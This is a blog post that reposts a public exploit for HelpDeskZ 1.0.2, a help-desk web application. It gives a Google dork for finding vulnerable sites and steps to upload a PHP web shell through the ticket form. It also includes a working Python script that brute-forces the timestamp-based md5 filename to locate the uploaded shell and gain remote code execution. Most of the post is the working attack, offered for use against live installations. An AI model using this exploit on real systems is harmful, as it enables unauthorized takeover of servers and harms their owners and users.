Popular Post

Popular Posts

  • >
  • HelpDeskZ 1.0.2 - Unauthenticated Arbitrary File Upload

HelpDeskZ 1.0.2 - Unauthenticated Arbitrary File Upload

Posted by : ./B1TCHx Rabu, 30 November 2016

'''
# Exploit Title: HelpDeskZ <= v1.0.2 - Unauthenticated Shell Upload
# Google Dork: intext:"Help Desk Software by HelpDeskZ"
# Date: 2016-08-26
# Exploit Author: Lars Morgenroth - @krankoPwnz
# Vendor Homepage: http://www.helpdeskz.com/
# Software Link: https://github.com/evolutionscript/HelpDeskZ-1.0/archive/master.zip
# Version: <= v1.0.2
# Tested on:
# CVE :
 
HelpDeskZ <= v1.0.2 suffers from an unauthenticated shell upload vulnerability.
 
The software in the default configuration allows upload for .php-Files ( ?!?! ). I think the developers thought it was no risk, because the filenames get "obfuscated" when they are uploaded. However, there is a weakness in the rename function of the uploaded file:
 
/controllers <https://github.com/evolutionscript/HelpDeskZ-1.0/tree/006662bb856e126a38f2bb76df44a2e4e3d37350/controllers>/*submit_ticket_controller.php - Line 141*
$filename = md5($_FILES['attachment']['name'].time()).".".$ext;
 
So by guessing the time the file was uploaded, we can get RCE.
 
Steps to reproduce:
 
http://localhost/helpdeskz/?v=submit_ticket&action=displayForm
 
Enter anything in the mandatory fields, attach your phpshell.php, solve the captcha and submit your ticket.
 
Call this script with the base url of your HelpdeskZ-Installation and the name of the file you uploaded:
 
exploit.py http://localhost/helpdeskz/ phpshell.php
'''           
import hashlib
import time
import sys
import requests
 
print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit'
 
if len(sys.argv) < 3:
    print "Usage: {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0])
    sys.exit(1)
 
helpdeskzBaseUrl = sys.argv[1]
fileName = sys.argv[2]
 
currentTime = int(time.time())
 
for x in range(0, 300):
    plaintext = fileName + str(currentTime - x)
    md5hash = hashlib.md5(plaintext).hexdigest()
 
    url = helpdeskzBaseUrl+md5hash+'.php'
    response = requests.head(url)
    if response.status_code == 200:
        print "found!"
        print url
        sys.exit(0)
 
print "Sorry, I did not find anything"

{ 1 komentar... read them below or add one }

  1. Travelling Heroo10 Oktober 2022 pukul 09.13

    That was really nice. I recently updated privacy policy and DMCA of my site. Can you please check and say is it okey?

    BalasHapus

Navigation

Weekly most viewed

Blogroll

- Copyright © ./B1TCHx a.k.a Patih - Devil Survivor 2 - Powered by Blogger - Designed by Johanes Djogan -